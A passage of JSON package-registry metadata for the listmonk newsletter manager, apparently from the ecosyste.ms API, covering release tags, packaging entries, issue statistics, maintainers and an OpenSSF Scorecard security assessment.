alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-18T03:14:30.602Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/listmonk?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-11T05:00:15.084Z","issues_count":923,"pull_requests_count":424,"avg_time_to_close_issue":6063203.975,"avg_time_to_close_pull_request":1067791.0233918128,"issues_closed_count":640,"pull_requests_closed_count":342,"pull_request_authors_count":188,"issue_authors_count":621,"avg_comments_per_issue":2.734561213434453,"avg_comments_per_pull_request":1.0919811320754718,"merged_pull_requests_count":240,"bot_issues_count":0,"bot_pull_requests_count":66,"past_year_issues_count":95,"past_year_pull_requests_count":67,"past_year_avg_time_to_close_issue":3185527.6666666665,"past_year_avg_time_to_close_pull_request":636134.3191489362,"past_year_issues_closed_count":33,"past_year_pull_requests_closed_count":47,"past_year_pull_request_authors_count":44,"past_year_issue_authors_count":81,"past_year_avg_comments_per_issue":1.4105263157894736,"past_year_avg_comments_per_pull_request":1.462686567164179,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":15,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/listmonk/codemeta","maintainers":[{"uuid":"RaitoBezarius","login":null,"name":"Ryan Lahfa","email":"ryan@lahfa.xyz","url":"https://github.com/RaitoBezarius","packages_count":335,"html_url":null,"role":null,"created_at":"2026-03-02T13:11:26.791Z","updated_at":"2026-03-02T13:11:26.791Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/RaitoBezarius/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2379},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-09-01T05:05:01.010Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":14231676,"name":"helm-charts-nr/listmonk","ecosystem":"helm","description":"A Helm chart for listmonk application","homepage":"https://github.com/knadh/listmonk","licenses":"Unknown","normalized_licenses":["Other"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":"helm-charts-nr","versions_count":4,"first_release_published_at":"2024-07-18T12:29:32.000Z","latest_release_published_at":"2025-01-27T08:48:42.000Z","latest_release_number":"0.1.12","last_synced_at":"2026-08-25T13:50:28.386Z","created_at":"2026-04-11T10:44:46.845Z","updated_at":"2026-08-25T13:50:28.387Z","registry_url":"https://artifacthub.io/packages/helm/helm-charts-nr/listmonk","install_command":"helm repo add helm-charts-nr https://sanjaykkr.github.io/helm-charts/ \u0026\u0026 helm install listmonk helm-charts-nr/listmonk","documentation_url":"https://artifacthub.io/packages/helm/helm-charts-nr/listmonk","metadata":{"app_version":"v2.1.0","chart_version":"0.1.12","category":null,"official":false,"deprecated":false,"repository_url":"https://sanjaykkr.github.io/helm-charts/","maintainers":[]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-17T17:59:57.000Z","size":51687,"stargazers_count":22959,"open_issues_count":105,"forks_count":2530,"subscribers_count":140,"default_branch":"master","last_synced_at":"2026-08-18T02:44:25.356Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-18T02:21:35.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36754175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-18T02:00:06.197Z","response_time":52,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manif